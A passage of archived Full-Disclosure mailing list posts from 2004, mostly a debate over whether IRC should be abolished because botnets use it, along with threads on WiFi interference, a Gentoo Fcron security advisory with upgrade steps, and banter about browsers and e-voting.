RE: [Full-Disclosure] WiFi question
It shouldn't take a wireless expert to tell you that...he should try it. I pick up all types of weird stuff all the time in Kismet..and it looks like something..but I know it isn't..the SSID is A^B^C^B^D^S^G, or in other words, trash. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Friday, November 19, 2004 10:51 AM To: Lachniet, Mark Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] WiFi question --On Thursday, November 18, 2004 09:32:27 AM -0600 Paul Schmehl [EMAIL PROTECTED] wrote: --On Wednesday, November 17, 2004 12:41:44 PM -0500 Lachniet, Mark [EMAIL PROTECTED] wrote: Could also be RF interference. One of my coworkers tracked down a particularly interesting problem with motion sensor lights. Turns out the motion sensors worked at the 240mhz range, which has resonance at 2.4ghz, or something like that. Hence every time the motion sensor worked, it would spew what the wardriving (site survey) apps thought was a zillion different access points with widely varying MAC addresses. I would have though it was a FAKEAP program also. I would assume the same could happen with other interference. Having a common SSID would seem to indicate this is not the problem, but just thought I'd mention it. Thanks for a particularly interesting and potentially useful bit of information, Mark. After forwarding this to our wireless expert, he responded with this (which he has authorized me to forward to the list.) I find it hard to believe that this is possible. 2.4Ghz is the 9th harmonic. By the time you get to the 4th harmonic of a signal, even in very very noisy radiators, the strength of the harmonic component of the signal is extremely minute. And, given the fact that one of those sensors (which most likely does *not* truly operate in the 240MHz portion of the spectrum) will have a very low output (Part 15 device), the 10th harmonic of that signal will be undetectible as it will be at or below the level of background noise. Finally, if a device managed to get past all of the improbabilities above, the chances of it *accidentally* creating a signal that looked like an 802.11 beacon packet, complete with preamble, header, etc is so off the charts as to be laughable. One other thing... If that device truly was operating at 240MHz, then the first harmonic would be 480MHz. I'm pretty sure that frequency lies in the public service bands (ie fire/police). If not, its very close. Given that and the fact that the first harmonic would be much stronger than the 9th harmonic, I'm pretty sure someone in those bands would have complained loudly to the FCC as they don't take intereference issues in those bands lightly. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Why is IRC still around?
Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies) Join #n3ws at EFnet, that's legit and not to speak with your buddies, yep , you will fall asleep less stupid tonight ... class101 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
Even better idea: Get sunset internet1 /me just solved problems 1-5 On Fri, 19 Nov 2004 12:40:26 -0500, Danny [EMAIL PROTECTED] wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Airport x-ray software creating images of phantom weapons?
On Thu, 18 Nov 2004 10:46:50 GMT, Joel Merrick said: Maybe it'll get leaked on the net and we'll find out they use a hard coded DES key that I could crack with my casio watch ;) No, ROT13 is way leet strong crypto as long as nobody knows it, as Skylarov found out... ;) pgpG2hTqU9Pd6.pgp Description: PGP signature
Re: [Full-Disclosure] Why is IRC still around?
Danny wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? And? There are a hell of a lot of normal users on IRC too who don't wreck havoc. A lot of spam comes in email. Does that make email bad? 2) A considerable amount of script kiddies originate and grow through IRC? And AIM, ICQ, Jabber, web-forums, mailing lists, etc. IRC is one medium amungst many. 3) A wee bit of software piracy occurs? Some, perhaps. But unlike, say BitTorrent or Kazaa, IRC's primary role is communication rather than file transfer. You could make the same argument for ANY of the IM clients that support file transfer. 4) That many organized DoS attacks through PC zombies are initiated through IRC? Many do. Yes. But many also originate through other media, and, again, it's not the medium's fault that people use it for nefarious purposes. Hitmen get calls on their cell phones. Should we eliminate cell phones to stop the hitmen? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Anonymity is not a bad thing in many, man, respects. And the list of legitimate uses goes on and on as well. Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? No offense. But the arguments aren't especially strong. We're not pushing to sunset the IRC protocol because there are still thousands and thousands of -legitimate- users in the world. Unlike most IM systems, the IRC nets are completely independant. There are some serious advantages to that. What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? Yes? IRC is a protocol. A tool like any other. Last I looked there were still hundreds to thousands of IRC users at any given time who were there just to hang out and BS with their friends. It's still a valid community if you will, in spite of the nefarious uses other people have put it to. If you sunset something like IRC, the 3v1L [EMAIL PROTECTED] will just move their bots and trojans somewhere else. ...D Cheers, L4J ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? It is not IRC that is the problem, it is the people on IRC that cause problems. Guns don't kill people all by by themselves; people kill people. What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D I would be lost w/o freenode. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Why is IRC still around?
How exactly do you propose to accomplish this? IRC is an open protocol and there are many open clients and open servers which can run on any port, and run encrypted with SSL. So do you intend to scan every computer on the Internet on port 6667, and shut down every server found running, the move on to random ports that zombies probably use, and start attacking sites that provide open source clients that use an open protocol? Your suggestion makes no sense, and it's something that's impossible to implement. Why not just make knives illegal? I mean, they're frequently used as a weapon, right? Ron Bowes Information Protection Centre Government Of Manitoba -Original Message- From: Danny [mailto:[EMAIL PROTECTED] Sent: Friday, November 19, 2004 11:40 AM To: Mailing List - Full-Disclosure Subject: [Full-Disclosure] Why is IRC still around? Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
Danny wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: ? 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? email, http, aol users;)? 2) A considerable amount of script kiddies originate and grow through IRC? and criminals through phones 3) A wee bit of software piracy occurs? p2p? 4) That many organized DoS attacks through PC zombies are initiated through IRC? just a control network, could also (and is) handeld through p2p-technologie 5) The anonymity of the whole thing helps to foster all the illegal anonymity?;) and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? yes, you are. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
Unfortunately IRC is not the problem. Removing IRC will cause the systems that use it to leverage another control channel. The people that abuse it will use another forum... The problem is that systems exist that can be mass exploited and used to coordinate attacks and that there are people happy to exploit those systems. You can use any of the following to coordinate the same attacks: - a web page - ping - DNS - newsgroups - ftp - AIM - Jabber - P2P - Email - blog ... Danny wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
Oh, crap s/Get/Why not/ Sorry On Fri, 19 Nov 2004 12:49:32 -0600, shrek [EMAIL PROTECTED] wrote: Even better idea: Get sunset internet1 /me just solved problems 1-5 On Fri, 19 Nov 2004 12:40:26 -0500, Danny [EMAIL PROTECTED] wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 12:17:09 -0800, Mister Coffee [EMAIL PROTECTED] wrote: Danny wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? And? There are a hell of a lot of normal users on IRC too who don't wreck havoc. A lot of spam comes in email. Does that make email bad? 2) A considerable amount of script kiddies originate and grow through IRC? And AIM, ICQ, Jabber, web-forums, mailing lists, etc. IRC is one medium amungst many. 3) A wee bit of software piracy occurs? Some, perhaps. But unlike, say BitTorrent or Kazaa, IRC's primary role is communication rather than file transfer. You could make the same argument for ANY of the IM clients that support file transfer. 4) That many organized DoS attacks through PC zombies are initiated through IRC? Many do. Yes. But many also originate through other media, and, again, it's not the medium's fault that people use it for nefarious purposes. Hitmen get calls on their cell phones. Should we eliminate cell phones to stop the hitmen? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Anonymity is not a bad thing in many, man, respects. And the list of legitimate uses goes on and on as well. Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? No offense. But the arguments aren't especially strong. We're not pushing to sunset the IRC protocol because there are still thousands and thousands of -legitimate- users in the world. Unlike most IM systems, the IRC nets are completely independant. There are some serious advantages to that. What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? Yes? IRC is a protocol. A tool like any other. Last I looked there were still hundreds to thousands of IRC users at any given time who were there just to hang out and BS with their friends. It's still a valid community if you will, in spite of the nefarious uses other people have put it to. If you sunset something like IRC, the 3v1L [EMAIL PROTECTED] will just move their bots and trojans somewhere else. Well said. Thanks for your time. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
On 19 Nov 2004, at 08:35, Xavier Beaudouin wrote: Thanks. I thought that it had more meanings :-D Given that Firefox is integrated in Linux... It isn't. ... Result : Firefox is not integrated in Linux, it is a third party software as /bin/bash or whatever that is given as a giveaway on the computer... Even less so. Bash is sometimes used as a component of startup scripts (#!/bin/bash...), while Firefox is just a plain old browser. In fact, I'm not so sure it's even a component of Nautilus. Is this a recent change? PGP.sig Description: This is a digitally signed message part
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 12:40:26 EST, Danny said: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? And is there *anything* on that list that is in the least bit IRC-specific, or can any *other* IM system work just as well? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? Only if you *also* manage to stomp out AIM, and MSN Messenger, and Yahoo, and Jabber, and... Because if you don't, they'll just pick up and move elsewhere. pgpYYNSove8Iw.pgp Description: PGP signature
Re: [Full-Disclosure] Why is IRC still around? (Because anything less would be uncivilized)
Well, fellow F-D'ers, thanks to the vast array of intelligence and experience found on this list, my rant about abolishing IRC has been proven to be far from a solution. Maybe I will throw my suggestion in as Feature Request for Internet2. :D ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
Wow, I think you have a great point! To add to the list, Los Angeles has quite a bit of crime, so I think that it should be removed from the face of the planet. Of course, I think some fraud has been occurring on eBay--remove them also. Oh, and some Catholic priests have been in the news for some questionable activities, why keep them around--Catholicism has been overated (been around too long), nuke em. /sarcasm IRC is a great communication tool that has grown and evolved over the years. There will always be a medium for questionable activities and illegal acts to propagate regardless of what communication link you remove. -Michael On Fri, 19 Nov 2004 12:40:26 -0500, Danny [EMAIL PROTECTED] wrote: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
On Fri, 19 Nov 2004 13:12:31 EST, Crotty, Edward said: I'm not a Win based guy (troll?) - Un*x here - and even I was offended by #1. There is such a thing as runas for Windows. Yes, but is *the main design* of the system run as a mortal, and use the 'runas' for those things that need more? Or is the *main design* We'll just elect the first user as Administrator, and include 'runas' in case somebody wants to Do It The Right Way? pgpqKJS1ONVdM.pgp Description: PGP signature
Re: [Full-Disclosure] Why is IRC still around?
Danny wrote: Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? Many people use IRC; and still do. It's a legitimate medium I've used since the 80's for it's intended purpose. Your abolish idea is, to be honest, a bit simplistic don't you think? Let's just cut through the proselytizing and ban this whole Internet thing, that'll stop 'em. :) What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? Path of least resistance. If not IRC another venue would be used. -- dk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Why is IRC still around?
Wow, NICE analogy Jeff! While IRC is here to stay... The future seems more like servers that're only hosted through big companies/etc as most datacenters are 'forbidding' use of IRC(Ports 6660-6669, 7000) on their network. Just a thought. ~ That's because the Internet is free and no one can control what survives on it. What survives isn't what is *ethical* but what is *useful*. And IRC is very useful for some people, so it's here to stay. The problem is not IRC; the problem is the misuse some people make of it. We cannot make knives dissapear, because they are useful; instead, we must get rid of people that uses knives to kill. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004, Danny wrote: What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? Narrow minded or not, it's irrelevent. Sure, the world *might* be a little teenie bit safer without IRC, but then, the same could be said about half the readership of this list (Hi Paul!): why not sunset them as well? Your argument boils down to the pre-emptive removal of anything that could conceivably be used in an illegitimate manner - as we have all seen with gun control, banning the *tool* is not going to stop the violence. Might as well ban knives, chewing gum, and techno music.. ...D -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF Civilization is in a tailspin - everything is backwards, everything is upside down- doctors destroy health, psychiatrists destroy minds, lawyers destroy justice, the major media destroy information, governments destroy freedom and religions destroy spirituality - yet it is claimed to be healthy, just, informed, free and spiritual. We live in a social system whose community, wealth, love and life is derived from alienation, poverty, self-hate and medical murder - yet we tell ourselves that it is biologically and ecologically sustainable. The Bush plan to screen whole US population for mental illness clearly indicates that mental illness starts at the top. Rev Dr Michael Ellner ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
My mistake; I was referring to the discussion, collaboration, and creation, not the spread. You mentioned DDoS attacks below. I don't believe that use is a form of discussion, collaboration, or creation. Some say we should, but I am not one of those. My point was to get rid of the most well established tool (and easiest to use) for these types of activities. Any tool can be used by anyone for good or evil. If one knows the kiddies are all hanging out on IRC, then you can get a lot of good info about what their new attacks are by loitering on their channels. What's the difference? IRC is so well established for the type of activity I am referring to. As it is established for many productive things. Ever check out freenode? I'll leave the piracy battle for someone else - I just mentioned it as a part of the problem. If you aren't prepared to defend it on this list, better not mention it. =) Sure netcat is an alternative, but which one is easier to use? Um... netcat, or raw tcp sockets. I would argue it is easier to write something that just opens a connection, and listens for commands to come back, than something that has to speak IRC. Speaking IRC has its own advantages, but in the absence of it, it is still trivial to manage a bot net. I thought I would throw out the idea. If you want to call me a troll, then so be it, but don't get your panties in a knot over the whole thing Pardon my harsh reply. It wasn't personal, and is directed only at your reasoning. It is a similar reasoning that leads to the slippery slope toward censorship. tim ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
One alternative - silc. http://www.silcnet.org/ G On or about 2004.11.19 12:40:26 +, Danny ([EMAIL PROTECTED]) said: Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on... Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Gregory A. Gilliss, CISSP E-mail: [EMAIL PROTECTED] Computer Security WWW: http://www.gilliss.com/greg/ PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 14:47:36 -0600, Bowes, Ronald (EST) [EMAIL PROTECTED] wrote: How exactly do you propose to accomplish this? IRC is an open protocol and there are many open clients and open servers which can run on any port, and run encrypted with SSL. So do you intend to scan every computer on the Internet on port 6667, and shut down every server found running, the move on to random ports that zombies probably use, and start attacking sites that provide open source clients that use an open protocol? Your suggestion makes no sense, and it's something that's impossible to implement. Why not just make knives illegal? I mean, they're frequently used as a weapon, right? Yah, you are right. I just needed to rant when I see all these trojan's written to call home (to an IRC channel) and DoS attacks coordinated via IRC to control unpatched anti-virus-less Windows PC zombies. Next topic... ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] University Researchers Challenge Bush Win InFlorida
Paul Schmehl wrote on 11/19/2004 11:07:47 AM: --On Friday, November 19, 2004 12:12:10 AM + Jason Coombs [EMAIL PROTECTED] wrote: http://www.computerworld.com/governmenttopics/government/policy/story/0,1 0801,97614,00.html?nas=PM-97614 I wouldn't trust anything coming out of Bezerkley without confirmation from competent researchers elsewhere. Furthermore, their more esteemed colleagues at CalTech already disagree with them. http://www.vote.caltech.edu/Reports/Florida_discrepancy3.pdf Even *if* they are correct (which is at least debateable) the 130,000 vote discrepancy they argue for won't overcome Bush's lead of 380,000, so this is, at best, an academic exercise. Paul, do you really feel that as long as the (potentially) fraudulent votes did not change the outcome (as far as we know...knowing absolutely nothing for certain at this point) it's perfectly ok that a method for fixing the e-votes exists and is in use...hypothetically? I'm just trying to understand where you are coming from on this...does it only stop becoming an acedemic excersize if the shoe is on the other foot? CONFIDENTIALITY NOTICE: This is a transmission from Kohl's Department Stores, Inc. and may contain information which is confidential and proprietary. If you are not the addressee, any disclosure, copying or distribution or use of the contents of this message is expressly prohibited. If you have received this transmission in error, please destroy it and notify us immediately at 262-703-7000. CAUTION: Internet and e-mail communications are Kohl's property and Kohl's reserves the right to retrieve and read any message created, sent and received. Kohl's reserves the right to monitor messages by authorized Kohl's Associates at any time without any further consent.
[Full-Disclosure] [ GLSA 200411-27 ] Fcron: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200411-27 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Fcron: Multiple vulnerabilities Date: November 18, 2004 Bugs: #71311 ID: 200411-27 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in Fcron can allow a local user to potentially cause a Denial of Service. Background == Fcron is a command scheduler with extended capabilities over cron and anacron. Affected packages = --- Package / Vulnerable / Unaffected --- 1 sys-apps/fcron = 2.9.5*= 2.0.2 = 2.9.5.1 Description === Due to design errors in the fcronsighup program, Fcron may allow a local user to bypass access restrictions (CAN-2004-1031), view the contents of root owned files (CAN-2004-1030), remove arbitrary files or create empty files (CAN-2004-1032), and send a SIGHUP to any process. A vulnerability also exists in fcrontab which may allow local users to view the contents of fcron.allow and fcron.deny (CAN-2004-1033). Impact == A local attacker could exploit these vulnerabilities to perform a Denial of Service on the system running Fcron. Workaround == Make sure the fcronsighup and fcrontab binaries are only executable by trusted users. Resolution == All Fcron users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose quot;gt;=sys-apps/fcron-2.0.2quot; References == [ 1 ] CAN-2004-1030 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1030 [ 2 ] CAN-2004-1031 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1031 [ 3 ] CAN-2004-1032 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1032 [ 4 ] CAN-2004-1033 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1033 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200411-27.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 2#signature.asc Description: Binary data 3#Mime.822 Description: Binary data AdmID:0691CE20CE16BF84945169EA2F42315C
Re: [Full-Disclosure] Re: Airport x-ray software creating images of phantom weapons?
Rot 13 may not be strong but rot12 is. I once posted a string that I only rotated 12 chars to my blog and it took a month before anyone figured it out that probably says more about the iq of the people reading my blog than the security of rot13. Adam Where is it written in the Constitution, in what article or section is it contained, that you may take children from their parents and parents from their children, and compel them to fight the battles of any war in which the folly and wickedness of the government may engage itself? Under what concealment has this power lain hidden, which now for the first time comes forth, with a tremendous and baleful aspect, to trample down and destroy the dearest right of personal liberty? Who will show me any Constitutional injunction which makes it the duty of the American people to surrender everything valuable in life, and even life, itself, whenever the purposes of an ambitious and mischievous government may require it? . . . A free government with an uncontrolled power of military conscription is the most ridiculous and abominable contradiction and nonsense that ever entered into the heads of men. -Daniel Webster On Nov 19, 2004, at 3:30 PM, [EMAIL PROTECTED] wrote: On Thu, 18 Nov 2004 10:46:50 GMT, Joel Merrick said: Maybe it'll get leaked on the net and we'll find out they use a hard coded DES key that I could crack with my casio watch ;) No, ROT13 is way leet strong crypto as long as nobody knows it, as Skylarov found out... ;) On Nov 19, 2004, at 3:30 PM, [EMAIL PROTECTED] wrote: On Thu, 18 Nov 2004 10:46:50 GMT, Joel Merrick said: Maybe it'll get leaked on the net and we'll find out they use a hard coded DES key that I could crack with my casio watch ;) No, ROT13 is way leet strong crypto as long as nobody knows it, as Skylarov found out... ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, November 19, 2004 9:40 am, Danny said: 2) A considerable amount of script kiddies originate and grow through IRC? 3) A wee bit of software piracy occurs? 4) That many organized DoS attacks through PC zombies are initiated through IRC? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? I think you answered the question. It is still around because it is useful for some. It's not like the ability to host an Internet server is regulated. Anybody can create one. -Eric -- arctic bears - email and dns services http://www.arcticbears.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 15:54:54 -0500, Tim [EMAIL PROTECTED] wrote: 1) A hell of a lot of viruses/worms/trojans use IRC to wreck further havoc? Isn't email the primary spreading mechanism of viruses? My mistake; I was referring to the discussion, collaboration, and creation, not the spread. should we sunset email? Some say we should, but I am not one of those. My point was to get rid of the most well established tool (and easiest to use) for these types of activities. 2) A considerable amount of script kiddies originate and grow through IRC? And if there were no IRC, they would use AIM, or MSN messenger, or more likely, jabber. What's the difference? It is popular amongst hackers (of any level of morality) because it is open. What's the difference? IRC is so well established for the type of activity I am referring to. 3) A wee bit of software piracy occurs? And it doesn't on any other protocol? People who want to pirate will do it using whatever tools are available. Take away one, and others will be used. I'll leave the piracy battle for someone else - I just mentioned it as a part of the problem. 4) That many organized DoS attacks through PC zombies are initiated through IRC? It wouldn't be any harder to pull this off via netcat. If it is the anonymity an attacker wants, they just use one of the zombies as the server. Sure netcat is an alternative, but which one is easier to use? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? How is it any more anonymous than email, or web, or any other unauthenticated protocol? My point was to get rid of the most well established tool (and easiest to use) for these types of activities. You obviously can't get rid of them all. Please don't tell me you trust the From: header in your email, or believe that all of the IPs in your weblogs are directly tied to a person's home PC. And all these years frig! The list goes on and on... Yes, but every one of those arguments is horribly flawed. I am not sure if you are just being a troll or what. I thought I would throw out the idea. If you want to call me a troll, then so be it, but don't get your panties in a knot over the whole thing Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? Am I narrow minded to say that it would be a much safer place? yes, you are being narrow-minded. Fair enough. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE is just as safe as FireFox
Dear Joe, So many out there use MS OS doesnt make it the best just as so many people go to McDonalds doesnt mean they make the best food -- (FROM LINKS TO LINKS WE ARE ALL LINKED) cheers. morris ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] WiFi question
On 10:50, Fri 19 Nov 04, Paul Schmehl wrote: --On Thursday, November 18, 2004 09:32:27 AM -0600 Paul Schmehl [EMAIL PROTECTED] wrote: --On Wednesday, November 17, 2004 12:41:44 PM -0500 Lachniet, Mark [EMAIL PROTECTED] wrote: I find it hard to believe that this is possible. 2.4Ghz is the 9th harmonic. By the time you get to the 4th harmonic of a signal, even in very very noisy radiators, the strength of the harmonic component of the signal is extremely minute. And, given the fact that one of those sensors (which most likely does *not* truly operate in the 240MHz portion of the spectrum) will have a very low output (Part 15 device), the 10th harmonic of that signal will be undetectible as it will be at or below the level of background noise. Despite your disbelief, this is basic physics and a core component of musical amplification. It may not be solely due to the device. There may be building cavities amplifying the signal. The is a radio wave we're talking about after all. Sufficient Harmonic Oscillation can result in a boosted signal or Resonance: http://www.sasked.gov.sk.ca/docs/physics/u5c42phy.html Finally, if a device managed to get past all of the improbabilities above, the chances of it *accidentally* creating a signal that looked like an 802.11 beacon packet, complete with preamble, header, etc is so off the charts as to be laughable. Its not an accident. Cheap equipment = low quality control = no suppression and filtering. One other thing... If that device truly was operating at 240MHz, then the first harmonic would be 480MHz. I'm pretty sure that frequency lies in the public service 